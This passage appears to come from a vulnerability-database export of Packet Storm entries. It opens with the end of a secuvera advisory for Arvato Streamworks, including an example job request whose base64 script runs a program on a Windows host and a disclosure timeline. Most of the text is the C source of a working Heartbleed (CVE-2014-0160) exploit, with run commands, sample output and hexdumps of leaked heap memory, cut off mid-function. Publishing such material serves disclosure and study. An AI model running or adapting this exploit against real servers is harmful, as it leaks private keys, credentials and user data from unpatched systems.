\n<UserName>[Username under which the agent should run the \nScript, e.g. LOCAL\\System]</UserName> \n<Password>[Add Password of the user if needed]</Password> \n<UseUserProfile>true</UseUserProfile> \n<MainScript>[base64-encoded Script code, e.g. \n\"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl\" \nto start a notepad.exe on a Windows Host]</MainScript> \n<KeepJoblogDays>10</KeepJoblogDays> \n</JobStartInfo> \n</ServerRequestStartJob> \n \nSolution: \nInstall Streamworks Release 9.3 \n \n(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available \nin German only) \n \nDisclosure Timeline: \n2016/05/12 vulnerabilities discovered \n2016/05/30 vendor initially contacted \n2016/06/13 sales representative replied \n2016/06/14 technically responsible contact details received \n2016/07/01 technical personnel contacted, appointment to discuss \nfindings made \n2016/07/11 submitted technical details to responsible personnel \n2016/07/12 responsible product manager replied. Committed to \nextend disclosure timeline due to \ncomprehensible reasons. New disclosure timeline: end of \nSeptember 2016 \n2016/09/08 product manager replied, suggested meeting to discuss fixes \n2016/09/27 meeting took place, half of the vulnerabilities were \nfixed. Timeline until disclosure extended \nagain due to difficult changes. Disclosure timeline \nextended to end of April 2017 \n2017/04/20 Contacted vendor again to remind of the near end of the \ndisclosure timeline. \n2017/04/27 Reply and ongoing discussion about when the fix will be shipped. \n2017/05/20 Vendor replied that due to customers' experience fewer \nreleases were made. The fix will be shipped \nin the second quarter of 2018. Extended disclosure \ntimeline until the end of June 2018. \n2018/04/03 Contacted vendor as reminder and to get a release ship date. 
\n2018/04/09 Vendor replied saying that within release 9.3 (shipped \nin 2nd quarter 2018) the issues will be fixed \nFinal disclosure timeline: 2019/01/14 after a \nsufficient grace period for customers to install the fixed \nrelease \n2019/01/14 public advisory disclosure \n \n \nCredits \nSimon Bieber, secuvera GmbH \nsbieber@secuvera.de \nhttps://www.secuvera.de \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide information to secure infrastructure and/or systems, not to be able to \nattack or damage. \nTherefore secuvera shall not be liable for any direct or indirect \ndamages that \nmight be caused by using this information. \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151177/secuvera-SA-2016-01.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:13:48", "description": "", "cvss3": {}, "published": "2014-04-24T00:00:00", "type": "packetstorm", "title": "Heartbleed OpenSSL Information Leak Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "PACKETSTORM:126308", "href": "https://packetstormsecurity.com/files/126308/Heartbleed-OpenSSL-Information-Leak-Proof-Of-Concept.html", "sourceData": "`/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit \n* ========================================================= \n* This exploit uses OpenSSL to create an encrypted connection \n* and trigger the heartbleed leak. The leaked information is \n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. 
The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS. \n* This exploit leaks upto 65532 bytes of remote heap each request \n* and can be run in a loop until the connected peer ends connection. \n* The data leaked contains 16 bytes of random padding at the end. \n* The exploit can be used against a connecting client or server, \n* it can also send pre_cmd's to plain-text services to establish \n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients \n* will often forcefully close the connection during large leak \n* requests so try to lower your payload request size. \n* \n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n* \n* E.g. \n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed \n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ connecting to 192.168.11.23 443/tcp \n* [ connected to 192.168.11.23 443/tcp \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=65535 \n* [ final record type=24, length=16384 \n* [ wrote 16381 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes 
of heap to file 'out' \n* [ heartbeat returned type=24 length=42 \n* [ decrypting SSL packet \n* [ final record type=24, length=18 \n* [ wrote 18 bytes of heap to file 'out' \n* [ done. \n* $ ls -al out \n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out \n* $ hexdump -C out \n* - snip - snip \n* \n* Use following example command to generate certificates for clients. \n* \n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\ \n* -keyout server.key -out server.crt \n* \n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\ \n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n* \n* todo: add udp/dtls support. \n* \n* - Hacker Fantastic \n* http://www.mdsec.co.uk \n* \n*/ \n \n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support \n* \n* use -u switch, tested against s_server/s_client version 1.0.1d \n* \n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1 \n* ... \n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........| \n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5| \n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.| \n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....| \n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................| \n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........| \n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............| \n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 
2e 3a 1a 32 f9 30 |..i....8...:.2.0| \n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U| \n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168| \n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......| \n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I| \n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....| \n* 0000054b \n* \n* \n* # openssl s_client -connect localhost:990 -dtls1 \n* ... \n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ SSL connection using AES256-SHA \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............| \n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n| \n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8| \n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...| \n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.| \n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5| \n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....| \n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M| \n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....| \n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...| \n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................| \n* 000000b0 00 01 00 00 00 00 00 00 00 
40 62 1c 02 19 45 5f |.........@b...E_| \n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............| \n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..| \n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...| \n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State| \n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter| \n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty | \n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..| \n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....| \n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..| \n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.| \n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y| \n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....| \n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.| \n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q| \n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,| \n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:| \n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..| \n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?| \n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..| \n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...| \n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+| \n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...| \n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.| \n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...| \n* 00000240 96 54 3f 7d 02 03 01 00 
01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..| \n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.| \n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...| \n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w| \n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..| \n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*| \n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............| \n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....| \n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..| \n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w| \n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX| \n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D| \n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j| \n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).| \n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"| \n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I| \n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y| \n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y| \n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.| \n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~| \n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;| \n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...| \n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.| \n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................| \n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* 000003d0 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 |................| \n* * \n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..| \n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.| \n* 0000054b \n* \n*/ \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <getopt.h> \n#include <signal.h> \n#include <netdb.h> \n#include <fcntl.h> \n#include <errno.h> \n#include <sys/socket.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <inttypes.h> \n#include <openssl/bio.h> \n#include <openssl/ssl.h> \n#include <openssl/err.h> \n#include <openssl/evp.h> \n#include <openssl/tls1.h> \n#include <openssl/rand.h> \n#include <openssl/buffer.h> \n \n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\ \n(((unsigned int)(c[1])) )),c+=2) \n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\ \nc[1]=(unsigned char)(((s) )&0xff)),c+=2) \n \nint first = 0; \nint leakbytes = 0; \nint repeat = 1; \nint badpackets = 0; \n \ntypedef struct { \nint socket; \nSSL *sslHandle; \nSSL_CTX *sslContext; \n} connection; \n \ntypedef struct { \nunsigned char type; \nshort version; \nunsigned int length; \nunsigned char hbtype; \nunsigned int payload_length; \nvoid* payload; \n} heartbeat; \n \nvoid ssl_init(); \nvoid usage(); \nint tcp_connect(char*,int); \nint tcp_bind(char*, int); \nconnection* tls_connect(int); \nconnection* tls_bind(int); \nint pre_cmd(int,int,int); \nvoid* heartbleed(connection* ,unsigned int); \nvoid* sneakyleaky(connection* ,char*, int); \n \nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch); \nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap); \nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority); \nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap); \n \nint tcp_connect(char* server,int port){ \nint sd,ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nhost = 
gethostbyname(server); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nbzero(&(sa.sin_zero),8); \nprintf(\"[ connecting to %s %d/tcp\\n\",server,port); \nret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); \nif(ret==0){ \nprintf(\"[ connected to %s %d/tcp\\n\",server,port); \n} \nelse{ \nprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port); \nexit(0); \n} \nreturn sd; \n} \n \nint tcp_bind(char* server, int port){ \nint sd, ret, val=1; \nstruct sockaddr_in sin; \nstruct hostent *host; \nhost = gethostbyname(server); \nsd=socket(AF_INET,SOCK_STREAM,0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nmemset(&sin,0,sizeof(sin)); \nsin.sin_addr=*((struct in_addr *) host->h_addr); \nsin.sin_family=AF_INET; \nsin.sin_port=htons(port); \nsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); \nret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); \nif(ret==-1){ \nprintf(\"[!] cannot bind socket\\n\"); \nexit(0); \n} \nlisten(sd,5); \nreturn(sd); \n} \n \nconnection* dtls_server(int sd, char* server,int port){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nint ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nunsigned long addr; \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] 
cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"bind()\"); \nexit(1); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_server_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] 
FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_accept_state (c->sslHandle); \n \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \n// bytes = SSL_read(c->sslHandle, buf, 4095); \n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nvoid ssl_init(){ \nSSL_load_error_strings(); \nSSL_library_init(); \nOpenSSL_add_all_digests(); \nOpenSSL_add_all_algorithms(); \nOpenSSL_add_all_ciphers(); \n} \n \nconnection* tls_connect(int sd){ \nconnection *c; \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_client_method()); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nconnection* dtls_client(int sd, char* server,int port){ \nint ret; \nstruct hostent *host; 
\nstruct sockaddr_in sa; \nconnection *c; \nmemset((char *)&sa,0,sizeof(sa)); \nc = malloc(sizeof(connection)); \nif ((host = gethostbyname(server)) == NULL) { \nperror(\"gethostbyname\"); \nexit(1); \n} \nsd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) { \nperror(\"connect()\"); \nexit(0); \n} \n \nBIO *bio; \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \n \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(DTLSv1_client_method()); \nSSL_CTX_set_read_ahead (c->sslContext, 1); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \n \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslHandle = SSL_new(c->sslContext); \nSSL_set_tlsext_host_name(c->sslHandle,server); \nbio = BIO_new_dgram(sd, BIO_NOCLOSE); \n \nBIO_ctrl_set_connected(bio, 1, &sa); \nSSL_set_bio(c->sslHandle, bio, bio); \nSSL_set_connect_state (c->sslHandle); \n//printf(\"eshta\\n\"); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \n \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat); \n} \nreturn c; \n} \n \nconnection* tls_bind(int sd){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_server_method()); \nif(c->sslContext==NULL) 
\nERR_print_errors_fp(stderr); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \nbytes = SSL_read(c->sslHandle, buf, 4095); \nprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nint pre_cmd(int sd,int precmd,int verbose){ \n/* this function can be used to send commands to a plain-text \nservice or client before heartbleed exploit attempt. e.g. 
STARTTLS */ \nint rc, go = 0; \nchar* buffer; \nchar* line1; \nchar* line2; \nswitch(precmd){ \ncase 0: \nline1 = \"EHLO test\\n\"; \nline2 = \"STARTTLS\\n\"; \nbreak; \ncase 1: \nline1 = \"CAPA\\n\"; \nline2 = \"STLS\\n\"; \nbreak; \ncase 2: \nline1 = \"a001 CAPB\\n\"; \nline2 = \"a002 STARTTLS\\n\"; \nbreak; \ndefault: \ngo = 1; \nbreak; \n} \nif(go==0){ \nbuffer = malloc(2049); \nif(buffer==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nprintf(\"[ banner: %s\",buffer); \nsend(sd,line1,strlen(line1),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \nsend(sd,line2,strlen(line2),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \n} \nreturn sd; \n} \n \nvoid* heartbleed(connection *c,unsigned int type){ \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \ns2n(0xffff,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \nret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); \nOPENSSL_free(buf); \nreturn c; \n} \n \nvoid* dtlsheartbleed(connection *c,unsigned int type){ \n \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2 + 16); \nmemset(buf, '\\0', sizeof buf); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \n// s2n(0xffff,p); \n// s2n(0x3feb,p); \ns2n(0x0538,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \ns2n(c->sslHandle->tlsext_hb_seq, p); \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 
